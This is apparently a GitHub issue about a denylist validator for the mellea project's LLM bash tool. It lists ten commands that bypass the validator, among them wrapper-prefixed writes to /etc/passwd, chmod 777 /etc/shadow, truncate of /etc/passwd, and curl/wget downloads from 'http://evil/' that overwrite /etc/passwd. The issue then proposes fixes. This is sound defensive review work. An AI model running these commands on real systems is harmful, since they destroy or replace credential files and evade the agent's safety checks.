Surfaced during PR #1056 review. The path-safety functions in mellea/stdlib/tools/shell.py (_check_dangerous_paths at L348, _check_working_dir_restriction at L408) early-return unless argv[0] is in a hardcoded 8-command set: {rm, touch, cp, mv, mkdir, mkfifo, mknod, tee}. Any other write primitive — and any wrapper-prefixed write — bypasses both checks. Filed so the bash tool can ship in #1056 and the docstrings stay honest about what the validator actually covers.
Problem
The bash_executor docstring states "Safety defaults: Refuses … writes to system paths (/etc, /sys, /proc, etc.)". The validator does not match this claim.
Verified against PR head c7623279 — all 10 return success=True, skipped=False:
# Wrapper bypass — argv[0] is the wrapper, not the write command
env touch /etc/passwd
nohup rm /etc/passwd
timeout 10 cp /etc/foo /etc/bar
# Write primitives not in `write_commands`
chmod 777 /etc/shadow
chown root /etc/passwd
install -m 644 src /etc/foo
ln -sf /etc/shadow /tmp/x
truncate -s 0 /etc/passwd
curl -o /etc/passwd http://evil/
wget -O /etc/passwd http://evil/
For bash_executor (Docker-isolated), the container is the actual write boundary, so the practical impact is bounded. For unsafe_local_bash_executor (no isolation) the gap matters — the docstring leads developers to grant the tool more authority than its checks justify.
Two valid resolution paths
Path 1 — extend the gate. Walk past a SAFE_WRAPPER_COMMANDS prefix and re-check the effective command. Add chmod, chown, dd (with of= parsing), install, ln, truncate, wget, curl to write_commands.
Path 2 — reframe the docstring. Position the denylist as a coarse filter and treat Docker isolation in LLMSandboxBashEnvironment as the actual write boundary. Drop or qualify the "Refuses writes to system paths" claim. Cleaner for bash_executor; unsafe_local_bash_executor still needs Path 1.
Success criteria
Surfaced during PR #1056 review. The path-safety functions in
mellea/stdlib/tools/shell.py(_check_dangerous_pathsat L348,_check_working_dir_restrictionat L408) early-return unlessargv[0]is in a hardcoded 8-command set:{rm, touch, cp, mv, mkdir, mkfifo, mknod, tee}. Any other write primitive — and any wrapper-prefixed write — bypasses both checks. Filed so the bash tool can ship in #1056 and the docstrings stay honest about what the validator actually covers.Problem
The
bash_executordocstring states "Safety defaults: Refuses … writes to system paths (/etc, /sys, /proc, etc.)". The validator does not match this claim.Verified against PR head
c7623279— all 10 returnsuccess=True, skipped=False:For
bash_executor(Docker-isolated), the container is the actual write boundary, so the practical impact is bounded. Forunsafe_local_bash_executor(no isolation) the gap matters — the docstring leads developers to grant the tool more authority than its checks justify.Two valid resolution paths
Path 1 — extend the gate. Walk past a
SAFE_WRAPPER_COMMANDSprefix and re-check the effective command. Addchmod,chown,dd(withof=parsing),install,ln,truncate,wget,curltowrite_commands.Path 2 — reframe the docstring. Position the denylist as a coarse filter and treat Docker isolation in
LLMSandboxBashEnvironmentas the actual write boundary. Drop or qualify the "Refuses writes to system paths" claim. Cleaner forbash_executor;unsafe_local_bash_executorstill needs Path 1.Success criteria
bash_executorandunsafe_local_bash_executordocstrings (around L827–855 and L859–885) match the chosen framing — no claim should overstate what the validator catches